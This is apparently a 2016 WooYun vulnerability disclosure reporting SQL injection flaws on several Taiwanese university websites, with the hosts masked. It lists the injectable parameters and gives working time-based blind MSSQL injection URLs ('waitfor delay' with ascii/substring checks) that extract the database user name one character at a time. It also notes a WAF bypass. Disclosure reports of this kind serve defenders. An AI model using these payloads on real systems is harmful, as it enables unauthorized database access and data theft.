漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0168524
漏洞标题:台湾多个大學SQL注入漏洞打包(臺灣地區)
相关厂商:Hitcon台湾互联网漏洞报告平台
漏洞作者: 404notfound
提交时间:2016-01-09 23:16
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-09: 细节已通知厂商并且等待厂商处理中
2016-01-10: 厂商已经确认,细节仅向厂商公开
2016-01-20: 细节向核心白帽子及相关领域专家公开
2016-01-30: 细节向普通白帽子公开
2016-02-09: 细节向实习白帽子公开
2016-02-22: 细节向公众公开
简要描述:
rt,求大神告知怎么破python脚本中mssql出现的错误
详细说明:
0x01
注入点:http://**.**.**.**/detail.php?articleId=50101
参数articleID可延时注入
0x02
台湾省佛光科技大学
http://**.**.**.**/news2.php?fid=9&pg_no=789
参数pg_no可延时注入绕过waf
0x03
注入点:http://**.**.**.**/2013/epaper/4c.php?id=54&aid=500
0x04
http://**.**.**.**/main/focus.php?aid=16
漏洞证明:
一个为例证明
注入点:http://**.**.**.**/naidice/course_detail.aspx?iid=2133
参数iid可延时注入
又遇到python脚本不能跑mssql的情况
还未找到解决方法,回头再去研究下lijiejie的脚本,现在只有手工
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20len%28user%29=3%20waitfor%20delay%20%270:0:2%27-- TRUE user长度为3
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20ascii%28substring%28user,1,1%29%29=100%20waitfor%20delay%20%270:0:2%27-- TRUE user第一位为d
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20ascii%28substring%28user,2,1%29%29=98%20waitfor%20delay%20%270:0:2%27-- TRUE user第二位为b
http://**.**.**.**/naidice/course_detail.aspx?iid=2133%27;if%20ascii%28substring%28user,3,1%29%29=111%20waitfor%20delay%20%270:0:2%27--
TRUE user第三位为o
user为dbo
修复方案:
过滤
版权声明:转载请注明来源 404notfound@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2016-01-10 21:26
厂商回复:
感謝通報
最新状态:
暂无